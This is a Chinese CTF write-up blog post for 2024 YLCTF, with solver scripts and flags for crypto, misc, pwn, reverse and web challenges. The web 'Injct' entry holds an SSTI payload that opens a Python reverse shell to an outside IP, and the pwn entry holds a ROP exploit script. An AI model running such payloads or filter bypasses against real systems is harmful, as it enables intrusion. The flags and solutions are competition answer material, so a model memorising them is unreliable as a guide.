2024 YLCTF

Round 1

Crypto

[Round 1] BREAK

随机了一个(55555,66666)的e,爆破一下就出了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from Crypto.Util.number import *
from gmpy2 import *

c = 2924474039245207571198784141495689937992753969132480503242933533024162740004938423057237165017818906240932582715571015311615140080805023083962661783117059081563515779040295926885648843373271315827557447038547354198633841318619550200065416569879422309228789074212184023902170629973366868476512892731022218074481334467704848598178703915477912059538625730030159772883926139645914921352787315268142917830673283253131667111029720811149494108036204927030497411599878456477044315081343437693246136153310194047948564341148092314660072088671342677689405603317615027453036593857501070187347664725660962477605859064071664385456
p = 112201812592436732390795120344111949417282805598314874949132199714697698933980025001138515893011073823715376332558632580563147885418631793000008453933543935617128269371275964779672888059389120797503550397834151733721290859419396400302434404551112484195071653351729447294368676427327217463094723449293599543541
q = 177020901129489152716203177604566447047904210970788458377477238771801463954823395388149502481778049515384638107090852884561335334330598757905074879935774091890632735202395688784335456371467073899458492800214225585277983419966028073512968573622161412555169766112847647015717557828009246475428909355149575012613
n = p * q
phi = (p-1) * (q-1)
for e in range(55555,66666):
    if GCD(e, phi) != 1:
        continue
    d = invert(e, phi)
    m = long_to_bytes(pow(c,d,n))
    try:
        flag=m.decode()
        if flag.startswith("YLCTF"):
            print(m.decode())
    except:
        pass

YLCTF{fbb6186c-6603-11ef-ba80-deb857dc15be}

[Round 1] ezrsa

解p q,然后直接pqec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from Crypto.Util.number import *
from gmpy2 import *

hint=104636942321216253499949196992650472436478390748311279997623168444858856212565005575470777025761133042669819087704276518792916869976910488638447567239130212411230613882721172767760926001948961427578800015022259031969968165104053974655999826752934643354758068059342697992941002284015306229237883529295068534566
n=113323597991624085061754988720439733629524452351931678771262752971035806969352132347016596705526432331903062544002592718117059786374051405428649396204710173913937575477670669321722166487652633727914336210161512781725047690929712364271174654635583233107540578279184329790997368051997427982806978603449019597017
c=107037286198526394985865182892078748932585076646994108020169994674725585397106369955977692402870725711803853270592931219086132270954286345566389580075401065352179549462941235338798967012704257894673451346168055976240149419808637015749212370865797366048562011252603524950648669269654406391113686485024119636451
e=65537
h=20240918
yl=bytes_to_long(b"YLCTF")

p=gcd(pow(20240918,e,n)-hint,n)
q=n//p
phi=(p-1)*(q-1)
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
[Round 1] r(A)=3

300次三元一次方程组出flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import numpy as np
from pwn import *

p=remote("challenge.yuanloo.com",33813)
for i in range(300):
    question=p.recvuntil(b"input x=")
    question=question.decode()
    if question.startswith("func") is False:
        question=question[1:]
    question=question.replace("*x","").replace("*y","").replace("*z","").replace(" ","")
    question=question.split("\n")
    print(question)
    tem1=question[1].split("=")
    tem2=question[2].split("=")
    tem3 = question[3].split("=")
    # print(tem1[0].split("+"),tem2[0].split("+"),tem3[0].split("+"))
    A=[np.array([int(coef.split('*')[0]) for coef in equation[0].split('=')[0].split('+')]) for equation in [tem1, tem2, tem3]]
    B=np.array([int(tem1[1]),int(tem2[1]),int(tem3[1])])
    solution = np.linalg.solve(A, B)
    # print(A,B)
    # print(solution,solution[0])
    p.send(b""+str(int(solution[0])).encode()+b"\n")
    p.recvuntil(b"input y=")
    p.send(b"" + str(int(solution[1])).encode() + b"\n")
    p.recvuntil(b"input z=")
    p.send(b"" + str(int(solution[2])).encode() + b"\n")
output = p.recvall(timeout=1)
print(output)
[Round 1] signrsa

joker了,写了半天n1 n2写反了

n1 n2不互质

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import gmpy2
from Crypto.Util.number import *

# 已知的密文和模数
c = 11516173591592387906528797379284719795659927455162331287042410048172205165682815496982552736149847293575228447650607173879891237665489165461873584174287049895850806805566416766585174732676570562193236916785212914791455690292098582511732972439329406423849445368901444923413796301821732962348908247264986674076253972004983394740647381170967650483500171133548129598809265793962610544123055917829945304385904168530690154121382284046800766368554453741911901865827653525076994196646226659413518765482367754861846294144696364783637484503733916678013113384781260011541947539387908774730911805898716383177397837414195581787711
n1 = 18674375108313094928585156581138941368570022222190945461284402673204018075354069827186085851309806592398721628845336840532779579197302984987661547245423180760958022898546496524249201679543421158842103496452861932183144343315925106154322066796612415616342291023962127055311307613898583850177922930685155351380500587263611591893137588708003711296496548004793832636078992866149115453883484010146248683416979269684197112659302912316105354447631916609587360103908746719586185593386794532066034112164661723748874045470225129298518385683561122623859924435600673501186244422907402943929464694448652074412105888867178867357727
n2 = 20071978783607427283823783012022286910630968751671103864055982304683197064862908267206049336732205051588820325894943126769930029619538705149178241710069113634567118672515743206769333625177879492557703359178528342489585156713623530654319500738508146831223487732824835005697932704427046675392714922683584376449203594641540794557871881581407228096642417744611261557101573050163285919971711214856243031354845945564837109657494523902296444463748723639109612438012590084771865377795409000586992732971594598355272609789079147061852664472115395344504822644651957496307894998467309347038349470471900776050769578152203349128951
p = gmpy2.gcd(n1, n2)
assert (p != 1)
print(f"p = {p}")
q1 = n1 // p
q2 = n2 // p
e = 65537
d1 = inverse(e, (p - 1) * (q1 - 1))
d2 = inverse(e, (p - 1) * (q2 - 1))
c = pow(c, d2, n2)
m = pow(c, d1, n1)
print(long_to_bytes(m))

YLCTF{23d36cbe-52d7-46b4-addb-56bde327a37f}

[Round 1] threecry

首先是确定素数p和q。已知a是512位的素数。利用相邻素数定律,得出得出n≈13×25×a2。通过对n开平方近似获取a,然后循环寻找下一个素数,直到n被整除,最终计算出p q,由于e=57742是偶数,过程中需要考虑e phi的互素关系。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from Crypto.Util.number import long_to_bytes
import gmpy2

def calculate_a_near(number2):
    a_near = gmpy2.iroot(number2 // 325, 2)[0]
    while number2 % gmpy2.next_prime(13 * a_near) != 0:
        a_near = gmpy2.next_prime(a_near)
    return a_near

def calculate_p_q(number2, a_near):
    p = gmpy2.next_prime(13 * a_near)
    q = number2 // p
    return p, q

def decrypt_c2(c2, e, number2):
    a_near = calculate_a_near(number2)
    p, q = calculate_p_q(number2, a_near)
    phi = (p - 1) * (q - 1)  # 直接计算 phi
    t = gmpy2.gcd(e, phi)
    d = gmpy2.invert(e // t, phi)
    m2 = gmpy2.iroot(pow(c2, d, number2), t)[0]
    return long_to_bytes(m2)

def decrypt_c1(c1, number1, number2, phi):
    d1 = gmpy2.invert(number1, phi)
    m1 = pow(c1, d1, number2)
    return long_to_bytes(m1)

if __name__ == "__main__":
    number1 = 6035830951309638186877554194461701691293718312181839424149825035972373443231514869488117139554688905904333169357086297500189578624512573983935412622898726797379658795547168254487169419193859102095920229216279737921183786260128443133977458414094572688077140538467216150378641116223616640713960883880973572260683
    number2 = 20163906788220322201451577848491140709934459544530540491496316478863216041602438391240885798072944983762763612154204258364582429930908603435291338810293235475910630277814171079127000082991765275778402968190793371421104016122994314171387648385459262396767639666659583363742368765758097301899441819527512879933947
    c1 = 12405608660999618097265957137437366071663331952214754002907325304531075800258689590061456707831342835487524037479295573967671590772372879729320816515170640997390767343571441259299771369979031179671545706559882752613500283385673730661771556761298039859614400629468643522376263695765234012418732741549726229907684
    c2 = 17867493009629454195723402795923807278976405761266687248923423443324682687084222151828263506140089233231214258259873864593871903110076859979044544920410209161618245640658572478006954994831673052121417154093147829059704015532088485831531000877870512720482263657406229891194171974695942960168522826499853303675454
    e = 57742

    a_near = calculate_a_near(number2)
    p, q = calculate_p_q(number2, a_near)
    phi = (p - 1) * (q - 1)  # 直接计算 phi

    flag2 = decrypt_c2(c2, e, number2)
    flag1 = decrypt_c1(c1, number1, number2, phi)
    print(flag1 + flag2)

Misc

[签到] 打卡小能手

没什么说的

YLCTF{W3lc0m3_T0_Yuan1ooCtf}

[Round 1] hide_png

眼睛看瞎了

image-20241010130322341

image-20241010130243649

YLCTF{a27f2d1a-9176-42cf-a2b6-1c87b17b98dc}

[Round 1] pngorzip

stegsolve lsb分离出zip,删除后面的无用内容,提示114514????

直接ARCHPR掩码爆破出114514giao

image-20241010130549709

YLCTF{d359d6e4-740a-49cf-83eb-5b0308f09c8c}

[Round 1] plain_crack

一眼丁真 明文攻击

压缩build.py,直接ARCHPR解一下,然后解出docx,改后缀为.zip在里面找到flag图片

1
2
3
4
5
6
7
8
9
10
11
12
# -*- coding:utf8 -*-

import pyminizip

def create(files, zfile):
    pyminizip.compress_multiple(files,[], zfile,"",0)
    pass

if __name__ == '__main__':
    files = ['build.py']
    zfile = 'crack2.zip'
    create(files, zfile)

image-20241010131438267

image-20241010131456743

image-20241010130916284

[Round 1] trafficdet

sklearn随机森林直接出,一开始以为要练模型折腾半天,诶,没血

训练集0.9 验证集0.1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score

train_data = pd.read_csv('train.csv')
train_data = train_data.dropna()

X = train_data.drop(columns=['Label'])
y = train_data['Label']
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.1, random_state=42)

model = RandomForestClassifier(n_estimators=100, random_state=42)
model.fit(X_train, y_train)
y_pred = model.predict(X_val)

print(accuracy_score(y_val, y_pred))

test_data = pd.read_csv('test.csv')
X_test = test_data
test_preds = model.predict(X_test)

result = pd.DataFrame({
    'Label': test_preds
})
result.index=result.index+1
result.to_csv('result.csv')
[Round 1] whatmusic

png逆序,修复宽高,翻转

lyra解音频,在线网站听一下,听不了一点

1
2
f=open("password","rb+").read()
f2=open("password.png","wb+").write(f[::-1])

image-20241011203712841

image-20241011213855014

image-20241011203751254

YLCTF{YLYRM6S5ICG00ODLL0VE}

Pwn

[Round 1] giaopwn

image-20241012204302823

image-20241012204318368

image-20241012204334392

1
2
3
4
5
6
7
8
9
10
from pwn import *

p=remote("challenge.yuanloo.com",43089)
p.recvuntil(b"welcome to YLCTF")
rdi=0x400743
system=0x4006D2
sh=0x601048
payload=b'a'*0x28+p64(rdi)+p64(sh)+p64(system)
p.sendline(payload)
p.interactive()

Reverse

[Round 1] xor

upx脱壳,看了是xor 28,直接写脚本解密

image-20241012002620489

image-20241012002638396

1
2
3
4
5
6
7
8
from pwn import xor

key=28
l=[0x45,0x50,0x5f,0x48,0x5a,0x67,0x7e,0x2f,0x7f,0x2d,0x29,0x7f,0x24,0x25,0x31,0x25,0x79,0x79,0x2f,0x31,0x28,0x7e,0x7f,0x2e,0x31,0x7e,0x78,0x2d,0x7d,0x31,0x2f,0x2c,0x2e,0x79,0x7d,0x7f,0x28,0x7a,0x2c,0x29,0x7a,0x2f,0x61,0x1c]
flag=""
for i in l:
    flag+=xor(chr(int(i)%128),key).decode()
print(flag)

YLCTF{b3c15c89-9ee3-4bc2-bd1a-302eac4f05f3}

[Round 1] calc

gpt复原源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
typedef struct Stack {
    double* top; double* low; int size;
}stack;void init(stack* s) {
    s->low = (double*)malloc((sizeof(double))) s->top = s->low;s->size = 100;
}void push(stack* s, double e) {
    *(s->top) = e; s->top++;
}void pop(stack* s, double* e) {
    *e = *--(s->top);
}int main() {
    setbuf((__acrt_iob_func(0)), 0); setbuf((__acrt_iob_func(1)), 0);stack s; char ch;double d, e char num[100];int i = 0;init(&s);puts("input data , end of '#'");scanf("%s", &ch);while (ch != '#') {
        while (ch >= '0' && ch <= '9') {
            num[i] = ch;scanf("%c", &ch);if (ch == ' ') {
                d = atof(num);push(&s, d); i = 0;break
            }
        }switch (ch) {
        case'+':pop(&s\uff0c & d);pop(&s, &e);push(&s, e + d); break;case'-':pop(&s, &d);pop(&s, &e);push(&s, e - d);break;case'*':pop(&s, &d);pop(&s, &e);push(&s, e * d); break;case'/':pop(&s, &d);pop(&s, &e);push(&s, e / d) break;
        }scanf("%c", &ch);
    }pop(&s, &d); if (d == 125) {
        printf("%s", getenv("GZCTF_FLAG"));
    }
}
[Round 1] xorplus

解密RC4 xor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
def rc4_initialize(key):
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + ord(key[i % len(key)]) + 1300) % 256
        state[i], state[j] = state[j], state[i]
    return state


def rc4_transform(state, data):
    i = j = 0
    output = []
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        t = state[(state[i] + state[j]) % 256]
        output.append(((byte - 20) & 0xFF) ^ t)
    return bytes(output)


def main():
    secret_key = "welcometoylctf"
    encrypted_sequence = [0x91, 0x86, 0x1b, 0x2d, 0x9e, 0x6f, 0x28, 0x33, 0x4b, 0xa1, 0xa2, 0x97, 0xcc, 0x93, 0x22,
                          0x67, 0x42, 0xf1, 0x30, 0x2d, 0x80, 0x55, 0x4a, 0x1c, 0x6c, 0x76, 0x4b, 0x76, 0x7c, 0x26, 0x9,
                          0x98, 0x8a, 0x49, 0x5c, 0xfd, 0x8, 0x7d, 0x28, 0xf8, 0xc, 0x85, 0xa6]

    state = rc4_initialize(secret_key)
    decrypted_message = rc4_transform(state, encrypted_sequence)

    print(decrypted_message.decode('utf-8'))


if __name__ == "__main__":
    main()

Web

[Round 1] Injct

ssti fenjing直接嗦,bash -i弹不了shell,jiaja肯定有python,直接python弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import functools
import time
import requests
from fenjing import exec_cmd_payload

url ="http://challenge.yuanloo.com:30166/greet"
@functools.lru_cache(1000)
def waf(payload: str):
    time.sleep(0.01)
    resp = requests.post(url, timeout=10, data={"name": payload})
    return "Error" not in resp.text


if __name__ == "__main__":
    shell_payload, will_print = exec_cmd_payload(
        waf, 'python3 -c \'import socket, subprocess, os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("101.70.156.105",27661)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); subprocess.call(["/bin/sh", "-i"])\''
    )
    print(shell_payload)

image-20241011231338340

image-20241011231411184

[Round 1] Disal

简单绕过

a=9999999abcdef

b=9999a

image-20241012011422640

[Round 1] shxpl

过滤了%20|;?等一堆东西,f s t都不行

%09绕空格过滤,通配符绕禁止s

image-20241012035751372

image-20241012040139537

YLCTF{092b6c8d-542a-453d-bfe2-4cd72b902f4c}

Round 2

Crypto

[Round 2] ancat

题目提示叱咤月海鱼鱼猫,Ancat,看加密代码是一个改过的猫脸变换

网上找一下,再根据变换代码微调一下

image-20241020165142988

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import cv2
import numpy as np


def arnold_decode(image, shuffle_times, a, b):
    """ decode for rgb image that encoded by Arnold
    Args:
        image: rgb image encoded by Arnold
        shuffle_times: how many times to shuffle
    Returns:
        decode image
    """
    # 1:创建新图像
    decode_image = np.zeros(shape=image.shape)

    # 2:计算N
    h, w = image.shape[0], image.shape[1]
    N = h  # 或N=w

    # 3:遍历像素坐标变换
    for time in range(shuffle_times):
        for ori_x in range(h):
            for ori_y in range(w):
                # 按照公式坐标变换
                new_x = ((a * b + 1) * ori_x + (-b) * ori_y) % N
                new_y = ((-a) * ori_x + ori_y) % N
                decode_image[new_x, new_y, :] = image[ori_x, ori_y, :]
        image = np.copy(decode_image)

    cv2.imwrite('en_flag.png', image, [int(cv2.IMWRITE_PNG_COMPRESSION), 0])
    return decode_image

# 测试解密
img = cv2.imread("en_flag.png")  # 变换的图片
st = 3
a = 6
b = 9
pic = arnold_decode(img, st, a, b)
[Round 2] rand

ASIS2023原题,稍微改一下出

给定p,输入p,x,y满足gx+y≡x∗ymodp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
import re

io = remote('challenge.yuanloo.com', 35268)
for _ in range(40):
    intp3 = io.recvuntil(b'The modulus p is: ')
    intp = io.recvuntil(b"send the base g: \n")
    p=int(re.findall(r'\d+', intp.decode())[0])
    g = p-4
    io.sendline(str(g).encode())
    io.recvuntil(b'pow(g, x + y, p) = x * y, as x and y:\n')
    io.sendline(b"2,"+str(p-2).encode())
    print(p,_)
print(io.recvall(timeout=3))
[Round 2] ezAES
1
2
3
4
5
6
7
8
9
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = b'YLCTF-CRYPTO' + b'\x00' * (16 - len('YLCTF-CRYPTO'))
iv = b'YLCTF-IV' + b'\x00' * (16 - len('YLCTF-IV'))
encrypted_data = b'\xed\x1d]\xe6p\xb7\xfa\x90/Gu\xf4\xe2\x96\x84\xef90\x92e\xb4\xf8]"\xfc6\xf8\x8cS\xe9b\x19'
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size)
print(decrypted_data.decode())

\x00补全空位解密

input your result:keysauikoydasuicxs
YLCTF{c4bca408-a3bf-4b4b-8bb3-be483321319e}

Misc

[Round 2] Trace

文件后藏了base64,分离后cyberchef解出来rar,使用加密Rar5加密,ARCHPR用不了,于是用PasswareKit爆破出密码得到图片,PS拼一下得到flag

image-20241020161948798

image-20241018174609809

image-20241018193709589

[Round 2] IMGAI

简单预测,看了一下二进制转图大小640,480,pwntools接收直接reshape出来去预测

image-20241019161031685

image-20241019161433785

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import re
from pwn import *
import torch
import torch.nn as nn
from torchvision import transforms
from PIL import Image
import numpy as np


class MNISTCNN(nn.Module):
    def __init__(self):
        super(MNISTCNN, self).__init__()
        self.conv1 = nn.Conv2d(1, 32, kernel_size=5, padding=2)
        self.pool = nn.MaxPool2d(2, 2)
        self.conv2 = nn.Conv2d(32, 64, kernel_size=5)
        self.fc1 = nn.Linear(64 * 5 * 5, 1024)
        self.fc2 = nn.Linear(1024, 10)
        self.relu = nn.ReLU()

    def forward(self, x):
        x = self.pool(self.relu(self.conv1(x)))
        x = self.pool(self.relu(self.conv2(x)))
        x = x.view(-1, 64 * 5 * 5)  # 展平
        x = self.relu(self.fc1(x))
        x = self.fc2(x)
        return x


p = remote("challenge.yuanloo.com", 32061)
for i in range(36):
    a = p.recvuntil(b"input num %s \n" % str(i + 1).encode(), timeout=3)

    # 加载模型权重
    model = MNISTCNN()
    model.load_state_dict(torch.load('model.pth', map_location=torch.device('cpu')))
    model.eval()

    # 定义变换
    transform = transforms.Compose([
        transforms.Resize((28, 28)),
        transforms.ToTensor(),
        transforms.Normalize((0.1307,), (0.3081,))
    ])

    f = re.findall(r"[01]+", a.decode())[0]
    open(f"{i}.txt", "w").write(f)
    binary_data = f.strip()
    image_array = np.array([int(pixel) for pixel in binary_data])
    image_array = image_array.reshape(480, 640)

    image = Image.fromarray(np.uint8(image_array * 255), mode='L')
    image = transform(image).unsqueeze(0)

    with torch.no_grad():
        output = model(image)
        _, predicted = torch.max(output, 1)

    b = p.sendline(b"%s" % str(predicted.item()).encode())
    print(a[-14:], b"%s" % str(predicted.item()).encode())

data = p.recvall(timeout=5)
print(data)

image-20241018174518600

YLCTF{3c85be81-36a1-4aaa-bf93-83ec6faae780}

Reverse

[Round 2] ezwasm

建议放Cry/Misc,CyberCHef直接嗦了

image-20241018221201707

[Round 2] 三点几啦饮茶先

ez,直接网上找个解密脚本让AI微调

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#include <stdint.h>
#include <stdio.h>

void tea_dec(uint32_t* v, uint32_t* k) {
    uint32_t v0 = v[0], v1 = v[1];  // v0、v1分别是密文的左、右半部分
    uint32_t delta = 289739961;     // 根据之前的加密逻辑,delta值为289739961
    uint32_t sum = 40 * delta;      // 加密轮数为40轮,因此解密时sum是40倍的delta
    int i;                          // 在循环外部声明变量i
    for (i = 0; i < 40; i++) {      // tea加密进行40轮
        // 根据加密时的顺序颠倒下面3行的顺序,将加法改为减法(异或部分都是整体,不用管),就是逆向解密过程
        v1 -= (((v0 >> 5) ^ (16 * v0)) + v0) ^ (k[(sum >> 11) & 3] + sum);
        sum -= delta;
        v0 -= (((v1 >> 3) ^ (4 * v1)) + v1) ^ (k[sum & 3] + sum);
    }
    // 解密后的内容要还给v数组
    v[0] = v0;
    v[1] = v1;
}

int main() {
    // k为加解密密钥,4个32位无符号整数,密钥长度为128位
    uint32_t k[4] = {4097, 8194, 12291, 16388};  // 根据之前的加密逻辑,密钥为v9数组的值
    // v为要加解密的数据,两个32位无符号整数
    // 否则会报类型转换的错误,但是单独给每个元素赋值就可以,不清楚原因,但是也算学到一招,避免以后遇到这种问题没法解决
    uint32_t v[2] = {1913208188, -1240730499};  // 根据之前的加密结果,密文为1913208188和-1240730499

    // 解密
    tea_dec(v, k);

    // 打印解密后的结果
    printf("%u\n%u\n", v[0], v[1]);

    return 0;
}

926048868
1667512119

success give you flag YLCTF{0fb86ed4-318a-4567-b83c-c01d5529eaea}

Round 3

Misc

[Round 3] Blackdoor

D盾一把嗦

image-20241023161635764

image-20241023161648260

YLCTF{e2bae51b981c707eb28302fe22d60340}

#CTF #Misc #Web #Crypto
2024 YLCTF
https://more678.github.io/2024/11/01/2024-YLCTF/
作者
tenstrings
发布于
2024年11月1日
许可协议